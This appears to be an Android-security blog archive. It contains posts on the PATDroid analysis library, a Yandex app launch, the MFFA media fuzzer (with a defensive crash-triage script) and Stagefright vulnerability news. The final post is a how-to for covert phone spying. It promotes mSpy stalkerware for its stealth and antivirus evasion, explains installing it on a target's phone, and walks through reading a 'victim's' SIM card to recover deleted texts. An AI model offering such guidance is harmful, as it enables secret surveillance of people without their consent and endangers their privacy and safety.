Here is a one-sentence description of each package; detailed usage tutorials are on our wiki, linked from the package name. PATDroid requires Java 6 and runs fine on Oracle/OpenJDK 1.6 and 1.7 and on Dalvik (yes, you can run it on a smartphone). Gradle, IntelliJ IDEA and Eclipse projects are provided.
  • patdroid.core: provide abstractions for method, class, field, and primitive Java type values
  • patdroid.permission: specify what Android permissions are needed by every Android APIs
  • patdroid.fs: an emulated Android file system
  • patdroid.dalvik: Android Dalvik JVM instructions and representations
  • patdroid.smali: using SMALI to extract classes, methods, fields and instructions from an APK

According to our blueprint, we plan to release the following components one by one in the near future:
  • patdroid.dex2jar: uses dex2jar to extract classes, methods, fields and instructions from an APK
  • patdroid.manifest: the model for AndroidManifest.xml and Android components such as activity, service, broadcast receivers
  • patdroid.sdk: modeling different Android API levels
  • patdroid.taint: sources, sinks and taint propagation support for taint analysis
  • patdroid.lifecycle: modelling the life cycles for important Android components
  • patdroid.layout: understanding layout.xml
  • patdroid.soot: my tribute to Sable's Soot. I learned a lot from attending Sable's seminars held at McGill McConnell 2nd floor

Using PATDroid

PATDroid uses the Apache License 2.0. Additionally, if you intend to use it in academic work, please cite our paper:

@inproceedings{appaudit,
  author    = {Mingyuan Xia and Lu Gong and Yuanhao Lyu and Zhengwei Qi and Xue Liu},
  title     = {Effective Real-time Android Application Auditing},
  booktitle = {Proceedings of the 2015 IEEE Symposium on Security and Privacy},
  series    = {SP '15},
  year      = {2015},
  publisher = {IEEE Computer Society},
}


History and Philosophy

PATDroid was part of AppAudit, a security tool that checks whether an Android app leaks personal data. You can find more details in our S&P'15 paper. We make part of AppAudit public so that it is useful to researchers and developers. Overall, we try to make the entire project:

  1. concise (with as few abstractions as possible, so that users won't feel like they are searching for a needle in the ocean)
  2. properly documented (javadoc and wiki tutorials)
  3. loosely coupled (packages try to be self-contained)
  4. efficient (graduate students need a life with their bf/gf, not with computers)
  5. look like good code

Download

~ Friday 11 September 2015 0 comments

Yandex Rolls Out Multifunctional App for Android Users


Press Release:

"The current popularity of Android OS on markets across the world stems from the universal accessibility of a wide range of cheap smartphones that support this platform.

Android-powered devices allow everyone, including those who are not ready to pay a lot of money for the privilege of using mobile internet, to enjoy all the benefits of staying online while on the move. On the flip side, budget phones lack power when it comes to performance and memory space, so users often have to install only the most frequently used apps to keep their phones alive. 'There's an app for that' doesn't really work for a lot of budget smartphone users.

To make life easier for low-end phone users – at least when it comes to Yandex services – we have re-launched our search app for Android. The new Yandex app has expanded the range of its functions and is now an all-in-one solution that caters to multiple needs of its user – from current weather, currency exchange rates or traffic conditions to what's on in the cinema around the corner, or the shortest way to the nearest bank or restaurant. To solve any of these tasks one doesn't even need to have a specialized app, such as Yandex.Maps, Yandex.Navigator or Yandex.Weather, installed on their phone – the refurbished Yandex app will take the user to the mobile version of the relevant service at Yandex.ru."

Reported by Yandex



~ Thursday 6 August 2015 0 comments

MFFA - Media Fuzzing Framework for Android

The main idea behind this project is to create corrupt but structurally valid media files, direct them to the appropriate software components in Android to be decoded and/or played, and monitor the system for potential issues (i.e., system crashes) that may lead to exploitable vulnerabilities. Custom-developed Python scripts are used to send the malformed data across a distributed infrastructure of Android devices, log the findings and monitor for possible issues, in an automated manner. The actual decoding of the media files on the Android devices is done using the Stagefright command line interface. The results are sorted, in an attempt to keep only the unique issues, using a custom-built triage mechanism.
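The triage step described above, as an added example that is not part of the MFFA project: it reads the native-crash lines that Android's debuggerd writes to logcat for each fuzzed input, builds a signature from the signal and the top stack frames, and buckets the inputs so repeated hits on one crash site count as a single issue. The log excerpts, symbol names and offsets are constructed for illustration; the abort-frame filtering is an assumption about how a practitioner would avoid collapsing every abort() into one bucket.

```python
import hashlib
import re
from collections import defaultdict

# Constructed logcat excerpts in debuggerd's native-crash format; names and offsets are illustrative.
CRASH_A = """\
F/DEBUG   (  123): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414141
F/DEBUG   (  123):     #00 pc 0001a2b4  /system/lib/libstagefright.so (SampleTable::setSampleToChunkParams+112)
F/DEBUG   (  123):     #01 pc 0001c0f0  /system/lib/libstagefright.so (MPEG4Extractor::parseChunk+1024)
F/DEBUG   (  123):     #02 pc 0000b3c8  /system/bin/stagefright
"""
# Same crash site reached by another mutated file: only the fault address differs.
CRASH_B = CRASH_A.replace("0x41414141", "0x8")
# A different issue: an abort(), whose top frames are identical for every abort.
CRASH_C = """\
F/DEBUG   (  124): signal 6 (SIGABRT), code -6 (SI_TKILL), fault addr --------
F/DEBUG   (  124):     #00 pc 00039f0c  /system/lib/libc.so (tgkill+12)
F/DEBUG   (  124):     #01 pc 00014b3f  /system/lib/libc.so (raise+10)
F/DEBUG   (  124):     #02 pc 00020e3c  /system/lib/libstagefright.so (MPEG4Extractor::readMetaData+60)
"""
SAMPLE_RESULTS = [("a.mp4", CRASH_A), ("b.mp4", CRASH_B), ("c.mp4", CRASH_C), ("d.mp4", "I/stagefright( 321): decoded 240 frames\n")]

SIGNAL_RE = re.compile(r"signal \d+ \((\w+)\)")
FRAME_RE = re.compile(r"#\d{2} pc ([0-9a-f]+)\s+(\S+)(?: \(([^)]+)\))?")
ABORT_FRAMES = {"tgkill", "pthread_kill", "raise", "abort"}  # shared by every abort()

def crash_signature(log, depth=3):
    """Hash of the signal plus the top `depth` frames; None when the run did not crash."""
    sig = SIGNAL_RE.search(log)
    if sig is None:
        return None
    frames = []
    for pc, obj, sym in FRAME_RE.findall(log):
        # Symbol without offset; unsymbolized frames use library + relative pc (stable under ASLR).
        name = sym.split("+")[0] if sym else f"{obj.rsplit('/', 1)[-1]}+{pc}"
        if name not in ABORT_FRAMES:  # otherwise every abort() would share one bucket
            frames.append(name)
    if not frames:
        return None
    return hashlib.sha1("|".join([sig.group(1)] + frames[:depth]).encode()).hexdigest()[:12]

def triage(results):
    """Group (input file, logcat text) pairs into {signature: [input files]}."""
    buckets = defaultdict(list)
    for name, log in results:
        sig = crash_signature(log)
        if sig is not None:
            buckets[sig].append(name)
    return dict(buckets)
```

Running `triage(SAMPLE_RESULTS)` yields two buckets: one holding a.mp4 and b.mp4 (the same SampleTable crash site) and one holding c.mp4, while the clean run is dropped.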


Some results - vulnerabilities discovered

  • Multiple integer overflows in Stagefright code (libstagefright SampleTable):
    • CVE-2014-7915
    • CVE-2014-7916
    • CVE-2014-7917
  • A crafted MPEG4 media file can result in heap corruption in libstagefright, which can lead to arbitrary code execution in the mediaserver process:
    • CVE-2015-3832

Download and read more at:

~ Thursday 30 July 2015 0 comments

Android Phones Can Be Hacked With Just A Text Message


Yes, you heard it right!


About 990 million Android phones could be hacked with just a simple text. This is one of the biggest smartphone flaws ever found.


The security research company Zimperium claims to have found a bug that lets an attacker tap into the world's most popular mobile platform. The hack relies on a flaw in Stagefright, a core Android component and media playback service built into Android that is used to process, record and play multimedia files.

This security hole puts 990 million Android devices at risk, which is a truly huge number of smartphones. In 2014, more than 1 billion Android phones shipped throughout the world, according to Strategy Analytics, which expects the number to go up in 2015 and beyond. Zimperium termed Stagefright the "Mother of all Android vulnerabilities". In this attack, the victim would not need to make any mistake such as opening an attachment or downloading a corrupt file. The malicious code would take over instantly, the moment the text message is received. The victim may not even see anything.

Once the attackers get in, Drake says, they would be able to do anything: copy or delete data, or take control of the camera and microphone to monitor the victim's every move. "It's really up to their imagination what they do once they get in," he said.

Joshua Drake, VP of platform research and exploitation at mobile security firm Zimperium, reported the flaw to Google earlier this year, but he said that most manufacturers have not made fixes available to their user base to date.

All the bugs have been assigned CVE numbers, which are used to identify severe vulnerabilities. They are CVE-2015-1538, CVE-2015-1539, CVE-2015-3824, CVE-2015-3826, CVE-2015-3827, CVE-2015-3828 and CVE-2015-3829. When the disclosure lands today, security researchers and attackers could have enough information to get cracking on exploits. Manufacturers have been asked to ship patches as soon as possible to protect their customers against this flaw.

Drake, who deserves much credit for his work in addressing and fixing the issues, will disclose even more information at the Black Hat and DEF CON security events taking place in Las Vegas next week.



~ Monday 27 July 2015 0 comments

How to Spy on Text Messages

It seems that in recent years most of society, especially the younger generations, have turned to texting as their preferred mode of conversation. The infinite ability to communicate with other people around the world effortlessly has become a growing concern for parents and employers alike who wish to 'keep an eye on', or monitor, their children or employees. In this post we will discuss the methods and implications of text message spying.

Methods To Spy On Text Messages

There are several methods to spy on text messages; however, we will only discuss the following two, which happen to be easy for parents/employers to use to monitor their children's/employees' activities.

Method 1: Using a Spying App

The easiest way to spy on text messages is to use a spying application. Today there exist literally hundreds of products claiming to spy on text messages, but most of them are overpriced or not compatible with a wide variety of smartphones. With that said, there are still a few spying applications that stand out from the competition, and one of my favorites is mspy.

mspy possesses state-of-the-art stealth capabilities for spying on various text messaging applications such as WhatsApp, Viber, Facebook Messenger, LINE and so on. Apart from that, you can also monitor call logs and track the location of the smartphone (an absolute must-have for parents). The best part is that you don't have to jailbreak your iOS device or root your Android device in order to install it.

How does it work?

Upon placing an order for mspy, you receive an application that you have to install on the target's phone by launching the browser on the target phone, typing the URL, and downloading and executing the application. Once you have installed it successfully, it sends alerts to your control panel or account, which is created when you sign up. In case of any issue you can simply contact their 24/7 support team.


Features

  • Monitor call logs, SMS and contacts.
  • Spy on Internet activity including social media like Facebook, Twitter and Gmail.
  • It is not detected by antiviruses and operates in complete stealth mode.
  • Spy on text messaging apps like WhatsApp, iMessage, Viber, Snapchat, Skype, LINE and more.
  • Track GPS locations in real time.
  • Spy on all multimedia content stored on a device. Monitor what children are storing on their devices.
  • 24/7 live support.

Compatibility

  • iPhone/iPad (iOS 6 – 8.3)
  • Android Phones (Version 4+)

Disclaimer: SOFTWARE INTENDED FOR LEGAL USES ONLY. It is a violation of United States federal and/or state law and your local jurisdiction's law to install surveillance software, such as the Licensed Software, onto a mobile phone or other device you do not have the right to monitor. RHA shall not be responsible for any misuse of this product.

Method 2: Using SIM Card Reader To Recover Messages

If you can't afford a spying app, you could look for free alternatives, but there are a few drawbacks. One is that a lot of those found on forums are backdoored, and they also require a good amount of technical knowledge to set up and operate. Another way is to buy a SIM card reader and use the victim's SIM card to recover the messages or phone contacts stored on it.

Requirements

  • PC/SC compliant smart card reader

Note: Some phones tend to keep messages in their internal memory; in that case you have to move the messages from internal memory to the SIM card.

Step 1: Download "Dekart SIM Manager" from here.


Step 2: Once the SIM card has been plugged into the SIM card reader and the card reader has been connected to your computer, press the "READ" button to read the messages, GSM contacts, last dialed numbers, etc.


Step 3: Since our aim here is to recover deleted messages, we go to the "SMS messages" tab. To recover a message, right-click on it and select the "Undelete" option. Once this is done, press the "Write" button to write it back to the SIM card.

Note: The messages marked in red are deleted messages, whereas the messages marked in black are the ones still available on the SIM card.

Ref: https://www.dekart.com/fileadmin/howto/Howto-recover-deleted-SMS/SIM-Manager-undelete-SMS.png

Note: Please note that this method can only be used to recover SMS messages stored on the SIM, not WhatsApp, Viber, etc. messages. To overcome this, I would suggest using method 1.

~ Tuesday 21 July 2015 0 comments